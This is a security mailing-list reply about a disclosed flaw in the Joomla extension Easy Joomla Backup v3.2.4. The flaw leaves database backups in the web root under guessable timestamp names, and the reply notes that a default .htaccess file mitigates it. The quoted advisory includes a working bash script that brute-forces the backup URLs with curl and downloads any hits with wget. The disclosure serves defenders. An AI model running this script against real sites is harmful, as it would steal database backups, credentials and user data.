Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Thu, 28 Sep 2017 15:09:11 +0200
From: David Jardin <>
Subject: Re: Joomla extension Easy Joomla Backup v3.2.4
 database backup exposure

It’s worth to mention that the extension has a default .htaccess file with a „deny from all“ in the backup directory, that will mitigate the described attack on pretty much any standard shared-hosting platform that I’m aware of.

Am 28. September 2017 um 14:37:20, Larry W. Cashdollar ( schrieb:

Title: Joomla extension Easy Joomla Backup v3.2.4 database backup exposure  
Author: Larry W. Cashdollar, @_larry0  
Date: 2017-09-07  
Download Site:  
Vendor: kubik-rubik  
Vendor Notified: 2017-09-07  
Vendor Contact:  
Description: Easy Joomla Backup creates 'old-school' backups without any frills.  
The software creates a copy of the backup in the web root. The file name is easily guessable as it's just a time stamp:  

Exploit Code:  
• #!/bin/bash  
• #Larry W. Cashdollar, @_larry0 9/7/2017  
• #Bruteforce download backups for Joomla Extension Easy Joomla Backup v3.2.4  
• #  
• MONTH=09  
• DAY=07  
• YEAR=2017  
• Z=0  
• #May need to set the DOMAIN to $1 the target depending on how WP is configured.  
• echo "Scanning website for available backups:"  
• for y in `seq -w 0 23`; do  
• for x in `seq -w 0 59`; do  
• Y=`echo "scale=2;($Z/86000)*100"|bc`;  
• echo -ne "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b$CPATH $Y%"  
• for z in `seq -w 0 59`; do  
• Z=$(( $Z + 1 ));  
• CPATH="http://$1/administrator/components/com_easyjoomlabackup/backups/"$DOMAIN"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip";  
• RESULT=`curl -s --head $CPATH|grep 200`;  
• if [ -n "$RESULT" ]; then  
• echo ""  
• echo "[+] Location $CPATH Found";  
• echo "[+] Received $RESULT";  
• echo "Downloading......";  
• wget $CPATH  
• fi;  
• done  
• done  
• done  
• echo "Completed."
Kind Regards,
David Jardin
Content of type "text/html" skipped

Download attachment "signature.asc" of type "application/pgp-signature" (875 bytes)

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ